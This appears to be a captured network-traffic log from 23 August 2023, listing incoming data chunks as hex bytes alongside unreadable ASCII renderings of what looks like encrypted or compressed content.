                                                                                                                                                                                2023-08-23 07:28:58 UTC96INData Raw: 2d 15 96 55 23 87 a6 83 dd 24 22 f3 96 67 5a db ac 7d cb 37 7b de e7 33 6c 8a d1 fe fe 22 8b 55 0e 25 f1 da d9 ea 55 a0 38 5f 64 82 34 02 80 8d e4 6a 91 14 0a 4b d7 f5 5d bd 31 69 4c d3 83 2d ea 84 4a fa 70 c8 df c2 83 54 f8 5d 1d 6f 34 2d 0e 3f 1f 96 26 63 2e 4c 82 18 91 67 e7 dc dc 82 12 6e 93 f0 ec 8d 9c b7 71 b9 51 e3 0f ed 0f 2e 03 30 7d 59 9f 44 6e 31 1b 3a db 44 b8 c1 5a b9 19 af 5b 76 18 df 4e 37 ee 89 4a 52 c1 a7 f5 ea f3 96 d6 ae 15 7f a5 72 1a ea 89 2a 52 36 fa 40 35 10 8b 88 30 38 82 1d 9b 4c da d6 55 6f 70 55 8e f4 63 6e c2 b7 5e 52 ce 27 20 13 15 a4 76 ed 25 e6 76 89 b9 04 69 fd 66 00 b2 52 63 a0 54 eb ae 64 36 2e d4 73 19 83 dd d2 8f 6c b6 46 e6 92 2a e5 66 15 f5 3a 26 d8 ed ee f3 57 42 b5 7f 57 eb 6a c8 17 ff 3f a9 72 16 b4 c9 bc b5 00 56
                                                                                                                                                                                Data Ascii: -U#$"gZ}7{3l"U%U8_d4jK]1iL-JpT]o4-?&c.LgnqQ.0}YDn1:DZ[vN7JRr*R6@508LUopUcn^R' v%vifRcTd6.slF*f:&WBWj?rV
                                                                                                                                                                                2023-08-23 07:28:58 UTC97INData Raw: 63 45 49 ed e5 ba 54 cd b9 4d c2 ad b3 60 de 7f 8a 6d d4 69 aa 6f 01 33 d0 8d d3 c1 0e 5a b8 04 dc 59 b9 9f 9d f2 1e d8 f4 73 18 e5 1f 01 0c 8a cc f5 5c 65 de 94 35 d4 f4 41 5e 7f fb 68 11 f2 62 e5 76 47 e6 a6 66 b2 5a e6 43 fd eb 62 f2 4b 4c 29 02 ed 1e 61 80 0f 7e 7b 72 e2 e6 f6 4e 1c 28 12 49 46 ba 13 0a d5 38 c3 9c 51 9e 95 c1 4a 97 d7 14 c1 22 87 d1 6b 32 fa aa 99 30 0f ef e0 d6 90 0e a1 0e f2 e5 1e 79 c3 85 34 98 ea 40 ef 65 16 1e ce 85 9b ae db 41 fa 22 6a 89 00 f7 75 dd 6d 7d 19 a7 e8 61 1a ab a1 77 92 f2 10 c8 ab e9 e0 83 19 54 fc 76 b1 28 26 c6 f7 d3 40 dc f7 e5 a6 6e 76 e1 f9 eb 29 6c 3e fc 19 e1 f8 99 eb f5 22 29 d6 a7 cd ec 09
                                                                                                                                                                                Data Ascii: cEITM`mio3ZYs\e5A^hbvGfZCbKL)a~{rN(IF8QJ"k20y4@eA"jum}awTv(&@nv)l>")
                                                                                                                                                                                2023-08-23 07:28:58 UTC98INData Raw: 8c c9 94 5c 5a 24 35 95 e1 d8 76 79 9a d1 6f 6b 2e 25 30 a2 dc 96 7b bd 09 d2 27 42 34 8e 27 d1 bf c5 38 60 b9 9d 36 dd bd 80 40 92 f1 55 d9 a9 ec 90 62 8f 4d 64 a6 5c e4 98 2d 71 4a 7a 9a 85 f9 6b c4 ce c2 93 b7 1d 2c 43 64 1b 60 a5 c5 6e d7 a3 9e 06 28 57 da a8 4e 9c 03 21 85 c1 af d9 0f 4e 95 2a 4d 72 91 d1 e7 6f 4a 05 eb f9 e7 9e 70 52 b7 db f3 76 b9 cf 9e 22 68 b2 38 7b ad b3 a6 69 fd cd e8 5f d5 c6 23 f1 3e 2d 74 7e 61 b9 b1 56 41 9b 06 a7 7a 85 a4 75 0f 5c 63 8d 4c 0c e4 90 e9 29 c1 2f a5 f7 46 e1 6b 2d 14 39 fc 4e 43 ff ea ed 94 91 de 6e 65 83 3f 5b c7 ad 53 4f 64 03 95 5d 58 3c ba 18 de a7 aa 3e 05 7b 32 2b 5c 32 77 2b 6d 93 a2 57 ce 7b 29 96 12 7b da 25 f0 e3 0d af 20 1e 96 e6 4d c1 1b d1 a8 83 52 a6 3b 7f 80 aa f8 3d b7 d3 94 bf 45 ad 21 96 28
                                                                                                                                                                                Data Ascii: \Z$5vyok.%0{'B4'8`6@UbMd\-qJzk,Cd`n(WN!N*MroJpRv"h8{i_#>-t~aVAzu\cL)/Fk-9NCne?[SOd]X<>{2+\2w+mW{){% MR;=E!(
                                                                                                                                                                                2023-08-23 07:28:58 UTC99INData Raw: 9b c1 05 d6 f7 d3 7c 74 bf 61 d9 e2 4f 95 bc 21 46 4d b2 c8 d2 72 e4 f4 39 35 ae 44 44 a3 6e 73 91 e3 a0 4b 80 70 8d 4e 64 c2 8b df 4a 91 16 c4 ba ec 11 05 60 7d 33 35 99 e9 fa c5 30 8a 6d 36 9d ec 7c cf 8b b3 db d3 0b 2e ed 5b 37 88 e4 94 7f 69 02 02 f2 e5 7c f9 b6 80 81 67 e9 c6 a3 9e 53 3f cc b9 45 e8 c6 41 a7 bd ba fc 87 ab 72 13 e4 9f ad f7 1b da 77 4c f8 78 4f 01 ab d0 17 aa 53 55 98 74 85 28 c5 04 b3 41 62 41 7c 2b cf a4 cb e6 32 0d 47 ed 15 47 16 9a 4a 3a d6 66 a8 ab 92 26 3a 0a 8e 0e a1 f3 0f 83 2f 02 b6 29 3e 43 8f d5 81 e4 52 c1 8b ad 63 9b ac 38 cf df 2d b7 95 ae 89 e0 ed 64 fc 8f 16 46 9c f7 f8 ee 14 34 de 2b 09 c9 39 3a 38 64 8c 57 8a 4a 19 01 6b 1f 2f 55 a8 6d 70 f0 f8 fa 0c ae ae 39 08 82 d4 e5 34 3d 84 cf cd 2d 54 6a 3b 88 9e 95 c8 60 36
                                                                                                                                                                                Data Ascii: |taO!FMr95DDnsKpNdJ`}350m6|.[7i|gS?EArwLxOSUt(AbA|+2GGJ:f&:/)>CRc8-dF4+9:8dWJk/Ump94=-Tj;`6
                                                                                                                                                                                2023-08-23 07:28:58 UTC100INData Raw: 8d 37 7e 82 5c 27 42 f9 39 e0 0b c2 5c cc ec bc 4b 03 8b 41 9e 71 96 ad fa 3b a4 b0 b5 f3 18 41 48 6a 85 83 7f 83 c1 5a 8e 0d 53 00 68 19 8c 4c 22 7f a1 87 d1 e9 f0 64 b0 cf e6 d1 2f 52 8e 34 e9 41 bb b5 e4 5b 8c d2 4d 55 27 e8 f6 21 61 23 49 f9 c0 44 f4 6f 82 30 dc aa 91 9e d3 8a 01 ff 8c 65 6f 8f db 93 a3 63 ab fa a5 6a 74 4a 49 0f 2d 0b 36 d3 a2 5c 40 6c 01 59 9c a7 87 89 4b 88 06 8e 19 4b f5 78 0f d0 9c 89 02 2d 4c d6 41 07 17 5d 08 cc d2 cd f9 1d df 1a 48 9a 4a f2 27 9d bb f5 96 ef d8 4a 7e 7c dd 19 4a 7c c0 45 1d 4d eb 89 fd 21 66 93 af bd f9 3a 64 66 a0 a5 2a 20 34 2a 0f cc 36 74 ef a2 69 91 6d bd ca 0a a9 4c 7d 19 85 21 fd 72 65 23 6e 5c 03 35 8c 61 53 ba 66 ba 6f 0c f5 3d 1f 87 97 42 ff be 11 51 6f a2 a9 31 37 c9 28 5a d4 ca 7f 9c c6 84 1b 33 f5
                                                                                                                                                                                Data Ascii: 7~\'B9\KAq;AHjZShL"d/R4A[MU'!a#IDo0eocjtJI-6\@lYKKx-LA]HJ'J~|J|EM!f:df* 4*6timL}!re#n\5aSfo=BQo17(Z3
                                                                                                                                                                                2023-08-23 07:28:58 UTC101INData Raw: 3a d2 a7 46 bd 8e b8 47 af 56 14 14 f6 22 ca 15 fb 23 f2 21 6f 19 1d 23 e9 61 25 92 5f af e8 bd 60 38 c3 69 05 17 0f 8f 04 70 8c d6 7c 57 50 b0 a3 95 3d c1 78 72 8c a1 f8 8a 77 ff 64 ed b6 c5 b9 0b 36 ca 84 c1 c9 0f 19 20 30 08 2f d5 b3 a3 4b a7 d7 59 ab f5 8f 79 f0 86 1d 34 30 c6 00 bb 0e bb 92 f8 22 df 59 87 09 65 a6 fd 3d 5d 92 95 e7 bc 20 5d a2 a4 1e ed 54 20 21 06 eb 30 b6 d9 e8 2b 65 3f 1b a6 d1 0a cd 3e bc f3 0a 33 d4 5d 70 55 ea 08 cc fe 99 5f 4a 28 88 f7 55 85 4e e4 7f a6 f6 82 fd 6a 26 f1 74 37 21 ad 97 bb af 5c 28 58 66 9c 94 de 1d ce 04 e4 32 8e 6f ec 58 66 40 35 7a 4b e8 08 56 34 8f cf 0d 0d 5b aa dc fa 66 62 f5 0d ef e9 19 9b eb 95 1d 7c 04 36 de 70 a1 17 66 15 52 6b 61 be ff 8e c2 10 d4 14 11 56 12 7b a7 c0 ae 31 15 cf eb 3d a4 6a 6c 05 35
                                                                                                                                                                                Data Ascii: :FGV"#!o#a%_`8ip|WP=xrwd6 0/KYy40"Ye=] ]T !0+e?>3]pU_J(UNj&t7!\(Xf2oXf@5zKV4[fb|6pfRkaV{1=jl5
                                                                                                                                                                                2023-08-23 07:28:58 UTC102INData Raw: ab 48 72 7a fe 9e 80 07 7a 5d 75 89 e7 29 f7 6a be b8 82 15 5c 9f 6a 19 2e b0 d2 ad ea 71 df 25 c7 29 bb 8b d1 b3 57 10 20 52 9a c1 60 21 a0 83 e6 91 9a 55 30 0f 97 8a e3 7e 87 1e 90 33 f2 06 5a 5c 80 c3 2a 16 5c 7a 9f 38 e3 7c ff 4c dd 47 0b 94 5b a0 1b 70 32 ba fc c2 b9 fd 78 30 39 e1 9e a4 39 83 d4 00 cb 5f 1a 63 fd 46 20 8f 7e dd 0a 26 4c 9c dc 79 25 73 b6 f1 4f 7b 83 fd 31 be 9d 63 d9 ee 75 0a d5 2c 95 d3 f0 b2 05 06 e7 3b e9 34 29 69 4e 52 03 bc 3e a6 4c 7d 34 e2 ee 86 a6 5e a1 0e c6 6b 76 71 f8 81 ee 13 5e 2f be 8d fe 7c 9a 85 18 e1 92 d4 b1 1a 85 8f dc 2f c9 b1 30 c7 1f f0 b8 61 99 e4 2e 96 43 87 c1 15 6b bc 50 b9 4c 31 74 3b bb 7a f2 51 13 28 6e 38 c8 39 95 f2 77 34 a4 b7 ea 2c 82 08 03 e9 9b 90 56 7f 4e c1 89 cd 21 32 96 b3 5f 5c e9 e3 b7 8a 2d
                                                                                                                                                                                Data Ascii: Hrzz]u)j\j.q%)W R`!U0~3Z\*\z8|LG[p2x099_cF ~&Ly%sO{1cu,;4)iNR>L}4^kvq^/|/0a.CkPL1t;zQ(n89w4,VN!2_\-
                                                                                                                                                                                2023-08-23 07:28:58 UTC104INData Raw: 46 08 1e 46 14 6d 84 b8 da ed e0 df 64 cd 45 e1 1e 58 c7 33 e3 7c 51 e1 56 d9 bb 41 9e 03 e7 3a 57 11 fc b5 2c ef bb ae 18 4f 6d 07 a2 f1 7f 02 db 66 ff 24 8d ee b0 45 f1 73 1b e4 26 b1 39 79 58 51 27 1c c1 be b5 dd 61 0c 7c 18 1d 17 60 62 64 d7 8d 91 fb 1c a4 e2 d6 9a db ba f7 98 20 3c 37 62 ae 40 2d 5b d9 a0 0f 41 c2 c4 b1 65 bb 9e b1 44 86 21 e9 e3 ee bc 34 98 61 3a 8e 96 02 23 02 be 5b ee d1 16 79 91 5e e2 c1 0a a4 48 24 23 21 c9 e7 06 fe 46 60 6d 18 0e a3 e9 1b ff 10 50 ea d3 d9 df 64 3f 11 0a f9 cc 26 2b 8a 33 ed 79 e5 f0 6a 9b d9 c3 97 db 09 72 2a c6 20 cd e6 dd 55 da 93 7a 86 02 7b 2e 0a 6f f2 5b 6d d9 ab 1d bf ae 86 19 21 43 39 40 be 62 8f 59 2f 3d b0 46 bf 88 1c 86 53 5a 60 c4 4d da 06 ad b7 92 ef 07 0f 4a 2b 1d 61 04 32 5b 6c 7a ff f8 f6 24 09
                                                                                                                                                                                Data Ascii: FFmdEX3|QVA:W,Omf$Es&9yXQ'a|`bd <7b@-[AeD!4a:#[y^H$#!F`mPd?&+3yjr* Uz{.o[m!C9@bY/=FSZ`MJ+a2[lz$
                                                                                                                                                                                2023-08-23 07:28:58 UTC105INData Raw: c4 63 36 61 bf 4c 6f 83 be 88 76 b8 60 61 e8 34 80 7c 9d 63 0a db 2e 7d 4d 48 2e 13 71 19 b8 be 93 9f 89 f7 45 ea 84 f7 19 b1 52 ca b4 c9 5d a8 a6 57 10 63 35 26 0d 6a c0 38 1e 2d b3 99 e2 7f 97 a9 45 a7 8d 0f 6e c3 f3 7d 73 cb 8c 10 68 1b 13 41 c3 39 b2 3e c4 29 c7 50 c2 34 94 60 ec 9e 36 df fe 23 a6 0d bf 68 d3 4e a6 7e 96 fb b7 47 9d b0 7d 53 73 0e 86 5f bc b3 94 59 6b 9d 98 ce 90 c2 ef 33 66 f6 05 ca b4 c5 d5 5c d4 90 f8 4b df 50 d8 9a 78 51 77 15 ce d7 00 da df 3f 63 25 b9 f7 1e 01 bb e6 ac c7 18 85 a8 2b 46 c0 53 f8 dd ff 9a 5a 41 2a b6 fb 7d a7 54 21 20 84 08 20 12 59 18 ec 0f ff 4b 9e 3c fe 77 c6 a8 53 b9 e8 87 63 af 75 b7 bf 37 7f c3 b8 eb 9d d2 df fd fb a9 69 66 21 49 35 17 cd a7 b7 e7 26 31 e3 d0 1c c5 20 e9 65 78 0b 8a 43 25 f2 27 f2 52 ce fc
                                                                                                                                                                                Data Ascii: c6aLov`a4|c.}MH.qER]Wc5&j8-En}shA9>)P4`6#hN~G}Ss_Yk3f\KPxQw?c%+FSZA*}T! YK<wScu7if!I5&1 exC%'R
                                                                                                                                                                                2023-08-23 07:28:58 UTC106INData Raw: 96 24 93 02 8a 05 35 22 c3 e6 23 e0 b7 8e 6f cd a7 a6 4d 7a 7b 6b ef d5 ee 95 ae 9d c7 63 9b 26 4d c7 52 eb 26 c8 7e 19 9c 8a 7f fc d9 ad 53 4d 6c 1c 86 13 c5 6c 52 38 96 0d b1 8d 6f a7 f7 d8 f9 03 50 f0 cb 0d c9 a0 ce 8f 3f f6 43 fc af 72 8c e0 98 5f 56 6f fe 80 cc 5d 17 3a 02 c4 6e 1b 55 d5 23 e9 02 51 dd 58 c1 df 3d c3 f4 f1 11 2f 7e a8 69 05 88 7d ad d4 d6 61 f2 63 9a 16 2e 11 ae cb 0e bc 34 25 21 75 74 66 f6 58 61 19 06 66 d4 1c 83 a9 df fa 4a 4b 00 1f ff 03 e3 a7 a0 19 16 e8 63 50 ed 3b 23 76 57 6b 42 84 bd c3 98 d1 c4 ac 6f af 2e 01 66 86 9e 13 81 1c 15 5d 6e 10 f6 aa 17 10 f8 8b 70 1e 1f 43 54 ee 66 b4 09 f5 5c be da 42 4c 64 1a 4a ea 17 49 89 72 5d 10 8b 88 9b 76 00 38 c4 aa 39 45 f7 f4 a0 f9 93 fa 95 dc 4d 3d ad 3e de f2 73 44 cf 06 40 00 b9 a4
                                                                                                                                                                                Data Ascii: $5"#oMz{kc&MR&~SMllR8oP?Cr_Vo]:nU#QX=/~i}ac.4%!utfXafJKcP;#vWkBo.f]npCTf\BLdJIr]v89EM=>sD@
                                                                                                                                                                                2023-08-23 07:28:58 UTC107INData Raw: 61 03 67 4a c0 b3 cc 0c 02 98 3e 77 a7 b4 44 34 d9 73 4a 9c 01 a8 74 9c f7 d0 cc b1 82 d6 d1 9f 08 77 37 43 b8 ad 1c a5 1d be 13 7a 0a fe cb bb 44 0f 56 c9 78 1e 25 23 19 09 d4 bb 1c 55 86 9e 51 3a 00 18 54 10 7a 11 b7 b0 b6 cf 37 58 da 2a da a4 eb 89 24 13 28 0b f1 fd 75 f2 c5 cd e7 99 e7 62 fb 66 fa 92 b8 a0 ab 37 09 65 57 f4 e4 f2 a6 d7 b9 00 1a d9 62 97 1b fe 95 78 b1 47 af f6 c4 7a 15 6e db 1a 18 6a 0c 14 f1 20 22 fd c3 19 06 2a 5f c6 9e bc b4 20 cc 66 ea 91 07 e8 b3 d7 06 45 0b 26 81 89 1d 29 a8 72 ee de 80 51 b1 8e d1 28 60 40 c4 d2 8f 1f bb 90 e5 d4 b6 b1 8c bd 14 ed 7b 22 8e 52 b7 ee 54 29 79 cc b2 b5 28 80 70 f6 e5 06 65 6f f9 89 bf cc 8b 99 de c3 29 b8 64 28 f1 f5 1b 13 3d 28 2e ff 18 a6 9d c1 4f e0 b2 db c6 70 13 88 b0 d2 ff 06 03 34 ce d7 8e
                                                                                                                                                                                Data Ascii: agJ>wD4sJtw7CzDVx%#UQ:Tz7X*$(ubf7eWbxGznj "*_ fE&)rQ(`@{"RT)y(peo)d(=(.Op4
                                                                                                                                                                                2023-08-23 07:28:58 UTC109INData Raw: c1 df 7b 4d 3e 8c b9 e4 f2 0a cb e4 53 23 28 27 fa 48 7f 24 eb 06 67 97 89 c8 89 02 f3 c2 90 5c 54 82 63 54 fe e4 9c e8 d4 2b 94 98 dd b4 ea 73 33 8e 83 b9 49 82 c2 52 7c 69 de ae f5 e1 6e c0 00 74 35 3f 81 14 4e e5 b3 8a 0a 51 9c a4 00 31 33 d6 25 39 d3 7d 9a 3d 4a 4d 28 2e 2a 3f e7 6c 65 21 3a a5 4c 7d 17 27 77 f7 aa 94 6f d4 d4 61 0b de 76 16 a7 78 89 6f c2 80 fd 29 98 47 23 8c e0 77 54 71 d5 fd ae 4f fc 05 c1 77 ff a4 66 50 b0 f7 b7 77 1d 6f e8 c8 a8 71 ec 68 87 e8 78 5c c3 a1 99 8d 05 f2 8b a6 b6 0b e7 fc 55 55 0e 27 3c 47 23 fd 79 2a f9 bc 97 5a 99 d2 b3 ce 96 61 cd f9 5e 53 0a b6 ac 86 20 6f 40 e9 b1 bf 5d 4a b0 1f 89 95 9d a7 6e 2f ea 49 27 2a e8 6c 17 84 9a 85 9b a4 64 44 60 7e 77 ac 5d f1 77 fb ee 7b f0 ba 51 c9 1a 20 22 92 79 e4 01 52 f7 8c bc
                                                                                                                                                                                Data Ascii: {M>S#('H$g\TcT+s3IR|int5?NQ13%9}=JM(.*?le!:L}'woavxo)G#wTqOwfPwoqhx\UU'<G#y*Za^S o@]Jn/I'*ldD`~w]w{Q "yR
                                                                                                                                                                                2023-08-23 07:28:58 UTC110INData Raw: ad c3 2d a5 6c 2c 0b ad 5e 13 e6 c2 7e c4 07 3d 03 6d 58 bf db 6f 1d 28 59 41 bb 17 04 fa 83 ed 9c 59 f1 69 f3 31 45 e7 d9 b8 30 97 90 da 18 83 f2 46 13 0e bd a0 e9 1b 52 fd 64 30 3f 69 1e 52 cb 35 e7 1c 34 e9 7f 39 ef ca af 25 3d b5 a9 c0 54 5a 8b 93 db 6d ca 9b 1c 7f 21 aa 6d 91 bc e1 4a a7 52 56 a4 9e 9f 94 fa a3 73 6d db d5 bb 9a dc b5 6e d5 75 c1 27 37 80 51 7b 5e 7a 2c b2 59 b1 9a 3b bc dc 04 e0 8a a1 fc b5 f7 b0 53 d9 5a 11 0d cf 9f e0 1b a8 24 e0 72 b6 6c 65 6d 59 4c bc 69 62 20 2f 9e 5b 0b 5b 26 54 ea 37 f1 7a ab d6 fe 75 c3 4e 9f 5e e2 3d 54 ea 91 36 df d6 7f 08 7a b9 96 3e b9 13 5f 30 07 f1 98 a9 d0 6f 06 68 4b 85 bf 49 f1 e9 bf fd 8b 58 e5 33 b5 11 46 2e 93 52 0b f3 d3 5e 68 40 c6 31 34 01 5e 16 c6 c5 a7 a7 e2 74 68 0e 5c b9 8b 80 26 f6 b0 62
                                                                                                                                                                                Data Ascii: -l,^~=mXo(YAYi1E0FRd0?iR549%=TZm!mJRVsmnu'7Q{^z,Y;SZ$rlemYLib /[[&T7zuN^=T6z>_0ohKIX3F.R^h@14^th\&b
                                                                                                                                                                                2023-08-23 07:28:58 UTC111INData Raw: 9c a1 a3 d2 45 bf 09 b8 38 ab 4e 19 6c 2c e3 d0 af f5 5b 66 b5 a8 e1 e0 de f1 c8 ae a1 b7 b6 3e 94 eb ec 91 06 91 83 d9 a0 7c 47 e8 35 85 09 26 8e 2f e8 a3 c1 62 e7 09 71 ab 21 63 51 c2 72 dd 3f 2d cc 98 cc a8 62 bf 93 55 82 6d 02 3b 55 4f c8 c9 73 c3 ee f7 1e d4 8c a2 47 36 d0 ab 6e ed cc fd 27 d9 79 57 b0 b0 5b 05 b5 91 5e aa 03 55 c1 33 27 d0 b3 05 2e 30 ca dd de f7 c5 1d 13 cd c1 d8 e3 79 7d e3 aa a3 6f 3c 46 00 e2 3f bf 0a 46 bd b4 45 b4 4a 8d ea 4a 2d 2f fb 1e 19 41 90 4f 07 19 25 04 91 b4 3e 24 9e 12 95 1b 58 c2 7a 86 7f 22 a6 66 5e 68 b1 2c 89 f8 2f 54 4b f0 64 f4 0f e6 8a 83 5c 9d 78 de a9 db 7f 29 d2 cd d5 04 01 58 8c c2 2f d9 c9 e7 84 1a aa 53 c4 8d 40 44 50 a9 69 ff 51 8e a5 14 86 6f d6 5e 5c 06 3f 76 e8 65 aa 0e ee 40 f3 8e e7 11 53 10 6b 41
                                                                                                                                                                                Data Ascii: E8Nl,[f>|G5&/bq!cQr?-bUm;UOsG6n'yW[^U3'.0y}o<F?FEJJ-/AO%>$Xz"f^h,/TKd\x)X/S@DPiQo^\?ve@SkA
                                                                                                                                                                                2023-08-23 07:28:58 UTC112INData Raw: f0 69 a9 af 8f cd 71 9f 12 3a 2b e0 23 de 2e 52 85 9b 1a 2f 9b dd a8 a6 0a 41 6f 73 04 82 a5 47 15 20 87 00 28 d8 e2 ef 3b 02 f1 e9 8c 51 8b 18 8b 9e 7f cb 36 41 83 77 66 e8 bf 02 7b 1e 0d d9 0c 74 b6 1f e6 a1 e4 04 79 25 31 65 9b 27 c6 92 4a eb 2e d0 a4 02 64 62 a0 ec 8b 75 50 a9 58 8c 80 42 14 57 92 3d 94 90 98 27 ff d1 c2 3a 5c bc e1 e1 a7 f6 28 a6 77 8f 96 7d 24 b8 f0 af bb ec 9f 59 55 cf f0 80 cc 5c 2d d6 fc c2 5e 1b de e8 7f e2 45 41 3c 15 9e 9b bc 27 d1 13 69 16 e8 12 43 35 b0 ca d6 98 7f 16 d3 07 7d 5e ca c2 e8 c3 5f ba 7c 3e ec 61 f1 cf a9 34 d3 1f 06 66 37 01 f3 20 d9 2e 66 66 7f e0 2f d6 fd 78 14 c5 79 5e ca 83 84 60 fb b8 4f 61 e1 90 bd d5 98 0a c7 31 6e 2a 8b 0e 2c 2b ec 28 9c 1d 7d bc d2 c8 37 85 e7 d0 d1 eb 9e 48 fa bc 26 80 69 c0 9c e3 4c
                                                                                                                                                                                Data Ascii: iq:+#.R/AosG (;Q6Awf{ty%1e'J.dbuPXBW=':\(w}$YU\-^EA<'iC5}^_|>a4f7 .ff/xy^`Oa1n*,+(}7H&iL
                                                                                                                                                                                2023-08-23 07:28:58 UTC113INData Raw: df 48 21 dd 25 f5 0b 6a 8d f1 d7 3f cd 5c 1d 67 8f 60 c7 78 09 69 da c7 cd d6 a8 2a 91 1e 66 33 eb fe 78 cc f2 e1 96 40 71 cc 61 04 70 d5 5a 02 b9 e4 de a5 59 4b 97 74 eb e4 0f bf 90 9c af 5f 26 22 0a f8 d3 9d 62 04 f1 2d 92 fd d1 81 4e 77 37 43 82 ac c2 cb db 40 ec 85 61 79 3b 2e ac 33 2e 76 cb 66 5e dc 73 11 6a d9 4c 9b
                                                                                                                                                                                Data Ascii: H!%j?\g`xi*f3x@qapZYKt_&"b-Nw7C@ay;.3.vf^sjL
                                                                                                                                                                                2023-08-23 07:28:58 UTC114INData Raw: 87 0b 9e 07 90 c8 8b f8 52 ef a0 68 64 2a 9e 65 03 62 ad dd 98 e3 3f 45 97 fa 5f fc 75 67 9d 86 38 48 9f 6f 05 99 ed 1a c4 17 3e 40 6c 65 36 73 8e 0d 59 bd 4f ab fa ce 65 e9 20 41 95 52 b0 99 c1 81 39 85 ea ec 17 fb b0 7d 80 d3 59 56 ce 40 95 4e ee 1f 7c 8e 9e 29 fc 4d cc 07 b8 cc f8 17 30 fb 9e 98 d7 8f bc 5d 82 5d d1 29 84 fa d6 ee 9b 86 d3 28 f5 17 b6 0d 5e 5f 0d 6d 1a c3 68 20 25 15 96 7e d1 54 f7 94 90 b8 03 29 7b 86 b2 b5 cb 2e 96 a1 0d 9d f2 af 51 e2 e3 33 1e 4f e2 d4 96 be 1f 63 0e 9f 31 ad e0 77 57 fd 64 9d b7 87 5a e0 d3 20 83 8f ec e2 75 fd 1f 11 88 a3 75 7f 6d 3e 0b af ed b4 53 0a 95 d4 c4 85 aa 88 bd 97 e6 5a 6e fa 66 44 61 ca f3 e8 f7 45 74 2e 50 3b aa f6 45 97 20 9f de c5 33 b0 3b 8d ee 92 ae 33 82 c2 07 1b 40 2e a4 6e d4 8a b1 b4 8f 29 94
                                                                                                                                                                                Data Ascii: Rhd*eb?E_ug8Ho>@le6sYOe AR9}YV@N|)M0]])(^_mh %~T){.Q3Oc1wWdZ uum>SZnfDaEt.P;E 3;3@.n)
                                                                                                                                                                                2023-08-23 07:28:58 UTC115INData Raw: 41 60 0b 7e a4 ff ef c2 d0 e4 61 70 1d 91 c7 2f e5 fc 7b 00 9e 22 59 ad f7 45 28 20 9f de 2c c5 ea e9 a5 de 8a da 9a 15 35 75 40 75 a9 00 65 d4 d4 84 87 cf 7f 9d e0 70 25 08 5d 06 80 5c 8a 47 60 f2 69 0a 97 b8 99 08 fb 25 fb 57 7e 8f 30 4f 99 2e c1 a3 5a e5 c8 3a dd 45 f2 14 a4 fb c7 c8 77 66 ea e9 66 8d 51 43 35 f4 24 e2 fb fb af d8 14 0c 66 98 9d aa 9a cc f9 3f 53 d3 3c 9f 1a de 87 14 c1 2f 81 b7 5e fc 71 4d e3 71 10 91 a5 46 f2 d5 4d 5f fc 41 8b 2c 3b d7 e8 1e 9e f7 ac 99 75 7d 66 0e 7e 78 5d 09 f3 be 97 c5 bb bb c8 f5 32 a4 1d e2 dc c0 02 20 22 13 0a b7 ec c8 a3 05 3b a9 3b 52 4d 25 78 f4 29 43 66 f4 c4 d0 17 19 37 a1 c5 ee 25 4b 31 6c 3e a7 1b 41 59 d1 88 8e 25 12 c4 38 88 30 f0 f8 1a 50 6a 84 4a 84 dd 78 9d 7e 6f c1 c7 83 f8 6b 29 b0 13 99 1f b5 78
                                                                                                                                                                                Data Ascii: A`~ap/{"YE( ,5u@uep%]\G`i%W~0O.Z:EwffQC5$f?S</^qMqFM_A,;u}f~x]2 ";;RM%x)Cf7%K1l>AY%80PjJx~ok)x
                                                                                                                                                                                2023-08-23 07:28:58 UTC116INData Raw: 1c 5a 23 26 a8 4d 9a e9 cf 74 7c 8d bf a2 80 bd 4b fa 57 f3 0d 46 fb a2 29 94 85 88 81 7a 38 4a b8 6d 03 af d9 95 c1 c0 76 47 94 90 eb 63 ac dd 39 df d0 97 15 8f f9 3a 24 ba 42 04 ee e9 0e 7c 78 5d f5 6c e9 28 f2 be f2 62 85 0c 5f fd dc 95 17 e0 cb 8f 59 56 e9 e9 2f 17 49 f5 ae fd 42 3a e6 2f 1f ab 17 97 bc 0c 35 96 f1 53 02 38 d9 aa fd 4e 8b 6b a8 6e 12 c0 b6 3d 53 ff 0d 70 77 46 10 3e 49 74 28 1a 3e da 66 a0 9e 73 7a 8c 63 7f 57 bf c7 76 10 28 0d e1 37 2b 69 7d cd 80 8e 47 f8 cd 6b 18 1d 63 6e fe 20 ff 63 c6 33 51 cb 5d 1a c6 4e 29 7f 16 c7 20 8d 98 36 5f 5b ad a3 90 e9 d8 ec 7c 7e 8f 32 00 3d a0 d8 e9 0b 12 80 0b d5 ef 31 72 33 cc 71 ae 22 ee 46 ec ca 92 05 05 1b cb 59 3c ea 1d f1 95 05 3e 05 f8 f6 67 98 bb 4a 24 b3 96 a5 b6 55 3f d1 57 ca d6 40 fb b5
                                                                                                                                                                                Data Ascii: Z#&Mt|KWF)z8JmvGc9:$B|x]l(b_YV/IB:/5S8Nkn=SpwF>It(>fszcWv(7+i}Gkcn c3Q]N) 6_[|~2=1r3q"FY<>gJ$U?W@
                                                                                                                                                                                2023-08-23 07:28:59 UTC117INData Raw: 9c 93 32 ab 4f 43 d9 bd 36 d8 9b 1d e5 a2 57 63 83 c4 7b ed 35 91 d2 1d 1a d2 d0 61 06 3e 55 34 4a 13 40 bb 7d d9 f2 64 a5 3a 6b 21 b5 9d 46 a8 fb 49 c3 fd 72 f0 97 8a 58 ec c6 95 10 93 9f ea 46 ad 64 d8 e2 61 54 e3 a3 a7 29 ea 93 07 30 19 d5 77 a2 d9 24 36 8f 18 fd 1f f3 2d 86 78 de d1 be ce e6 1c 29 0e 6e f7 dc bb e1 de 95 c5 27 8f ae 82 32 30 22 a6 99 0f 57 fa 77 c9 b7 7f 16 9c a5 fa dd 38 93 37 6b b7 f2 cb 87 8a 57 f6 05 e4 92 de 06 15 38 b5 d4 8d dd cf bb 5f 53 a6 d8 df cd 23 a5 42 fb e0 31 08 09 6b 06 55 20 87 04 2a 9b 71 a6 66 40 f0 9d 55 65 d6 56 39 f1 8a 04 33 22 bc 1b dc 1f 07 98 f4 8c 7b 5d 9d f6 9e b5 62 e3 1b 71 6c c1 ba a0 57 72 c6 2b d9 25 7b 4f 62 57 ff b4 70 ad 8b 77 40 b5 85 42 96 43 cd ed 4a e8 d9 de 77 64 63 36 94 b8 6e 01 75 64 1f 2f
                                                                                                                                                                                Data Ascii: 2OC6Wc{5a>U4J@}d:k!FIrXFdaT)0w$6-x)n'20"Ww87kW8_S#B1kU *qf@UeV93"{]bqlWr+%{ObWpw@BCJwdc6nud/
